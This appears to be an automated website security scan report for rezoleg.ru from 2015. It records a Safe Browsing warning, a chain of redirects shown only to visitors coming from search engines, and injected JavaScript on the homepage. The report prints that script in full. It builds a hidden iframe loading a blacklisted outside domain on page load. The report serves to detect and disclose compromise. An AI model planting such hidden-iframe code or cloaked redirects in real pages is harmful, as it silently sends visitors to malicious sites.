Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rezoleg.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
| Request | Server response | Status |
URL: http://www.rezoleg.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.rezoleg.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 30 Jan 2015 13:56:02 GMT Location: http://web-redirect.ru/?web Server: nginx/1.4.1 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Set-Cookie: _cutt_caches_images=1422626162; expires=Sat, 31-Jan-2015 13:56:02 GMT; path=/ X-Powered-By: PHP/5.3.13 | malicious |
URL: http://web-redirect.ru/?web (imitation of visitor from search engine) GET /?web HTTP/1.1 Host: web-redirect.ru Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Found Cache-Control: max-age=0 Connection: close Date: Fri, 30 Jan 2015 13:56:02 GMT Pragma: no-cache Location: http://tatkuchma.com/components/com_weblinks/2/separator.php Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html; charset=utf-8 Expires: Thu, 21 Jul 1977 07:30:00 GMT Last-Modified: Fri, 30 Jan 2015 13:56:02 GMT X-Powered-By: PHP/5.3.3 | suspicious |
URL: http://tatkuchma.com/components/com_weblinks/2/separator.php (imitation of visitor from search engine) GET /components/com_weblinks/2/separator.php HTTP/1.1 Host: tatkuchma.com Referer: http://www.google.com/search?q=redirect+check3 | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 30 Jan 2015 13:56:02 GMT Location: http://tvoiprazdnik.by/unit/ Server: nginx/1.4.4 Content-Length: 236 Content-Type: text/html; charset=iso-8859-1 | suspicious |
Scanned pages/files
| Request | Server response | Status |
http://www.rezoleg.ru/ | 200 OK Content-Length: 3621 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 24corp-shop.com if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function showBrowVer() { var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://24corp-shop.com'; js_kod2.width = '250px'; js_kod2.height = '320px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } Decoded script: function showBrowVer() { var divTag = document.createElement("div"); divTag.id = "dt"; document.body.appendChild(divTag); var js_kod2 = document.createElement("iframe"); js_kod2.src = "http://24corp-shop.com"; js_kod2.width = "250px"; js_kod2.height = "320px"; js_kod2.setAttribute("style", "visibility:hidden"); document.getElementById("dt").appendChild(js_kod2); } | ||
http://www.rezoleg.ru/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/x-javascript | clean |
http://www.rezoleg.ru/test404page.js | 404 Not Found Content-Length: 292 Content-Type: text/html | clean |